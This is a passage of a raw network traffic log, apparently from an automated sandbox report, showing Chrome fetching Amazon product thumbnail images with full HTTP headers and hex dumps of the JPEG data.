                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC815INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 7620
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: f0631495-3463-484a-a206-edd015947bc7
                                                                                                                                                                                                                                                                Date: Thu, 08 Aug 2024 16:34:16 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 08 Jul 2024 04:04:45 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-228,/images/I/41gRz4miKkL
                                                                                                                                                                                                                                                                Expires: Wed, 03 Aug 2044 16:34:16 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-228 /images/I/41gRz4miKkL
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 0f9c1f26e53d95127196e190a08a56b8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 9239
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: jElclLK4Z-OZ1BiTIEIJH82lqa9rQDssGeWsgJS0Havl69eMUnqSYA==
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC7620INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 05 06 07 08 02 03 04 01 09 01 01 00 01 05 00 00 00 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b9 60 00 00 11 c1 23 f9 4d da 65 ca 8e
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"5`#Me


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                102192.168.2.449981151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC378OUTGET /images/I/41A1Lpkr9HL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC674INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 4959
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: ca32fe45-84fe-4ea5-a75a-210e51420983
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 07 May 2024 19:56:30 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                Expires: Mon, 01 Aug 2044 12:08:11 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 522925
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:36 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200049-IAD, cache-ewr18130-EWR
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 03 06 07 09 02 04 05 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 01 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 99 60 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"3`
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC1378INData Raw: 13 f9 b5 02 51 3e 46 d2 f2 f3 16 e3 4e 50 79 cd 79 ea bc a7 ba 18 b9 12 d5 7a 62 5b c0 6f 1b d1 09 cf d9 34 de a5 a3 d8 b5 74 d1 aa a7 03 95 4f 0b 7a 19 fc 1a e3 02 c2 47 76 90 4a 9b ec fb cf 3a d6 26 97 41 e7 35 e7 ab 72 9f e8 63 2c dc 72 c5 aa 4c 26 92 4d b8 e2 9d 3c 4a 26 c6 50 cb 19 63 00 c0 30 86 24 2d 83 ba 31 22 53 69 31 43 46 09 ed 97 9e af cb 7f a1 82 6c dd 77 01 4a 55 dc 50 40 b8 b8 b8 b8 b8 b8 b8 31 4e 7f 2d 66 42 86 bc 73 db 3f 3d 63 96 ff 00 43 08 5e 07 48 c3 c9 32 52 81 0c 43 10 b8 b8 b8 b8 bf 48 a5 65 a4 c7 a7 f9 ac f9 eb 3c b7 fa 18 73 f9 18 29 cc 2e 33 46 e3 f4 63 32 cc 8c a6 96 9f 9c 26 30 98 c2 63 01 8c 06 10 c2 d7 ec 96 a9 04 c1 66 4c 9d 31 ad 27 e3 e9 fe 6b 3e 7a df b4 c7 fa 18 73 f9 18 62 41 b3 71 0b 4f 7b 92 4d f1 fb c1 ad e2 19 cf
                                                                                                                                                                                                                                                                Data Ascii: Q>FNPyyzb[o4tOzGvJ:&A5rc,rL&M<J&Pc0$-1"Si1CFlwJUP@1N-fBs?=cC^H2RCHe<s).3Fc2&0cfL1'k>zsbAqO{M
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC1378INData Raw: 59 f2 55 67 c9 55 9f 25 56 7c 95 59 f2 55 67 c9 55 9f 25 56 7c 95 59 f2 46 b3 cc 87 f4 7b ff c4 00 2b 10 00 01 02 03 06 06 03 01 01 01 00 00 00 00 00 00 01 00 11 21 31 61 10 41 51 71 91 f0 30 81 a1 b1 c1 d1 20 40 f1 e1 60 70 ff da 00 08 01 01 00 01 3f 21 ff 00 7e 5c 20 2f 16 08 87 fa 1f 16 39 0f 0d a4 21 0a 52 94 84 20 4b 09 08 d2 23 83 c7 34 5a 03 5d 24 1c 53 d0 20 60 0c 84 31 f2 11 26 22 19 de 13 66 aa 2d c1 73 ba 09 26 a9 92 69 16 f9 07 d9 b0 e5 02 a3 7c d5 4e f9 aa 8d f3 5b 4f bb 21 d0 0b 60 a8 21 60 67 50 14 22 e8 3c c0 8b 8e 46 bd dc 60 8e 01 a0 22 fc 50 75 01 80 84 84 fa a3 94 c0 70 8f c4 50 f7 23 81 73 b2 13 37 9e 13 d8 7c 79 a0 42 5e 3b ae 38 4c dd 82 cc 75 20 80 5d 66 50 26 d8 c7 41 f0 8a 31 e1 06 04 e0 fb c4 f0 e6 aa e1 b8 e7 46 ec b2 65 87 20
                                                                                                                                                                                                                                                                Data Ascii: YUgU%V|YUgU%V|YF{+!1aAQq0 @`p?!~\ /9!R K#4Z]$S `1&"f-s&i|N[O!`!`gP"<F`"PupP#s7|yB^;8Lu ]fP&A1Fe
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC825INData Raw: 78 5b b6 cb 64 1b 96 dc e7 ce 0a c7 82 96 38 31 c6 94 94 f7 23 13 93 a3 3a 07 f0 4d 9a 23 58 d7 81 ca 08 1d d6 d9 85 4f fa 7e 91 f3 ff 00 a1 8d 58 f1 53 53 b2 3f 31 d7 2a 38 5f e0 45 1c af bd 85 55 66 be ae ea a8 8c 1f 15 ac cf 52 95 dd 59 51 53 d8 e7 95 5c 07 f8 a9 ab d9 1f 88 eb 8d 48 f0 97 a7 19 92 d0 f8 b2 09 b3 19 58 10 bd 3a a0 79 4a d2 0f 70 bd e2 35 87 54 1b 32 9c 5b 8c 6c 1c 03 36 6b bd cf d4 70 9b e3 99 53 34 2e f6 20 90 b1 ae a2 24 c3 df ae 2f ba a2 63 d8 99 1a c0 32 93 38 10 93 a4 ac 00 ae d6 02 97 a2 b8 b7 29 6a 56 b9 6e dc e1 4b 51 d6 84 90 6f 0a 3a 3c cd 80 56 90 d7 3f fa e2 4f 0f 6d 12 fe b9 7d 67 09 05 be eb 55 da 63 7b b7 5b 7a 65 ed 41 e0 3b d7 ad 8f 59 e6 57 a4 1b 3f 7c 6e 19 4e 74 3b e0 fd 9d 7e 61 0c 01 71 2d e6 c1 ae d0 4d 09 a5 13
                                                                                                                                                                                                                                                                Data Ascii: x[d81#:M#XO~XSS?1*8_EUfRYQS\HX:yJp5T2[l6kpS4. $/c28)jVnKQo:<V?Om}gUc{[zeA;YW?|nNt;~aq-M


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                103192.168.2.449983151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC378OUTGET /images/I/31Id2i6D-rL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:37 UTC682INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3410
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: f59ddd56-64fc-40fa-b06d-d9581bd4da23
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 12 Mar 2024 07:22:19 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                Expires: Mon, 01 Aug 2044 11:39:27 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 524649
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:37 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100049-IAD, cache-nyc-kteb1890081-NYC
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:37 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 08 03 04 05 06 07 02 01 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 04 05 01 02 03 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 99 60 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4`
                                                                                                                                                                                                                                                                2024-08-12 13:23:37 UTC1378INData Raw: 5c 61 d5 87 c1 87 52 83 ba 8f 18 02 e4 6f 44 eb 12 90 4a 11 d3 ec 10 ea 17 53 61 da 91 e1 af f4 55 8c 56 68 e2 13 fe 8a 09 a2 7c e0 8f a9 af 40 59 1d 6e a1 1b cd a3 de bb 66 0e 9e 24 55 99 3d 26 75 2e 10 24 8f 0a 94 78 2a c6 dc 95 3d 7c d0 a8 d1 4a 4e de d5 5b 30 75 a5 3c 6b 69 6d 27 ae ce 8a 88 ba 2c 30 53 56 db 2f 70 b2 71 b6 43 e4 65 5e 42 55 e4 25 5d fc ab bf 95 77 f2 ae f6 44 53 11 f3 fb ff 00 ff c4 00 26 11 00 01 04 01 02 05 05 01 00 00 00 00 00 00 00 00 02 01 03 04 05 00 06 11 12 14 20 31 32 07 13 15 21 50 10 ff da 00 08 01 03 01 01 08 00 fd fa 58 11 de 8e 64 eb 9a 7a bd d1 e1 29 be 9b 29 22 9c 09 91 ec a0 3a ac ca f9 17 f1 6c a4 62 d9 49 cf 93 93 95 b3 1d 75 d3 47 3a b4 d4 51 76 03 b8 6d 10 2e cb c4 b9 2a b6 34 e6 95 89 52 3d 2e 04 dc a3 bd a4 d5
                                                                                                                                                                                                                                                                Data Ascii: \aRoDJSaUVh|@Ynf$U=&u.$x*=|JN[0u<kim',0SV/pqCe^BU%]wDS& 12!PXdz))":lbIuG:Qvm.*4R=.
                                                                                                                                                                                                                                                                2024-08-12 13:23:37 UTC654INData Raw: 4b ca 6f ce 86 13 4c ce 51 e3 f9 0d fd 53 ed 5f 24 8a 42 9c 34 8e 1e bb 9f 59 c8 a6 7d e4 96 5e bc 50 fc 0c e6 3b 21 7a c8 6d d0 7b 3d 02 fc 21 48 d6 aa dd 8b 84 eb 03 59 0a e1 19 0d 7a ae 2f c4 ce 40 24 02 80 c3 39 51 b6 0e 6e b7 85 77 29 8b 03 3d b7 b7 f7 18 5e ca e3 ba d9 26 42 13 b7 ec 8d 57 9c dc 6c 8e 23 7d b6 f5 a2 fb 41 b9 7d 1c 7b 8a 79 12 79 c1 cb 03 5a c9 dc a4 63 ea bf 89 de 6c 97 c2 33 2c 93 8f 4e 33 04 7f 02 6d 19 6e 41 64 1c d9 9d b3 23 b9 bb 17 2d 29 8d a9 f3 18 1f f3 ed ff 00 c4 ad 12 f9 72 ec b3 bd 4a 6b d8 0f c3 0c 07 91 ea bc 9e f8 77 3c 0b 9a 4d 69 9a 50 3d 99 52 bc ad 1d f4 8d 38 d6 91 d2 24 38 03 9f 4f d1 86 98 b6 97 a3 ef 86 ca ae ed 4b a9 a4 d7 bf e1 7a bf 27 be 0c 81 81 72 91 c2 52 9d 47 3f d8 f6 94 bd 11 d3 d9 80 c6 5e 32 19 d5
                                                                                                                                                                                                                                                                Data Ascii: KoLQS_$B4Y}^P;!zm{=!HYz/@$9Qnw)=^&BWl#}A}{yyZcl3,N3mnAd#-)rJkw<MiP=R8$8OKz'rRG?^2


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                104192.168.2.44998018.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC611OUTGET /images/I/31Lxe89wp8L._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:37 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 4573
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: d77c4d4b-d467-4a13-9ff5-811e9847f659
                                                                                                                                                                                                                                                                Date: Thu, 01 Aug 2024 14:27:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Wed, 15 Sep 2021 14:45:46 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-803,/images/I/31Lxe89wp8L
                                                                                                                                                                                                                                                                Expires: Wed, 27 Jul 2044 14:27:00 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-803 /images/I/31Lxe89wp8L
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 a44309111e5e1050ff485adaa4681ad0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 432559
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: GKOMtWpAwcpecJt6RwbuzL_be2J39zT92JodNi8ARZtHNwSmwtPfZg==
                                                                                                                                                                                                                                                                2024-08-12 13:23:37 UTC4573INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 05 03 04 06 07 01 08 09 02 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ee 58 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"6X


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                105192.168.2.44998218.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:37 UTC611OUTGET /images/I/416l24m+1oL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:37 UTC805INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 7337
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: d1833c1b-d3c3-4b04-a533-3d7a5e33c1ff
                                                                                                                                                                                                                                                                Date: Thu, 08 Aug 2024 12:54:43 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Fri, 07 Apr 2023 17:15:52 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-549,/images/I/416l24m+1oL
                                                                                                                                                                                                                                                                Expires: Wed, 03 Aug 2044 12:54:43 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-549 /images/I/416l24m+1oL
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 327603281c948cac70b552029adb2e26.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: wNgPJbVuOaoGAAbtwcHIly4ndhFZAGmJyCeJI0MT0aum5Coa50kD8w==
                                                                                                                                                                                                                                                                2024-08-12 13:23:37 UTC7337INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 32 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 06 08 07 09 01 03 05 04 02 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b9 60 10 32 78 ab b1 b2 e3 2a ed a1 39 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"2`2x*9


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                106192.168.2.449985151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:37 UTC378OUTGET /images/I/41gRz4miKkL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:37 UTC675INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 7620
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
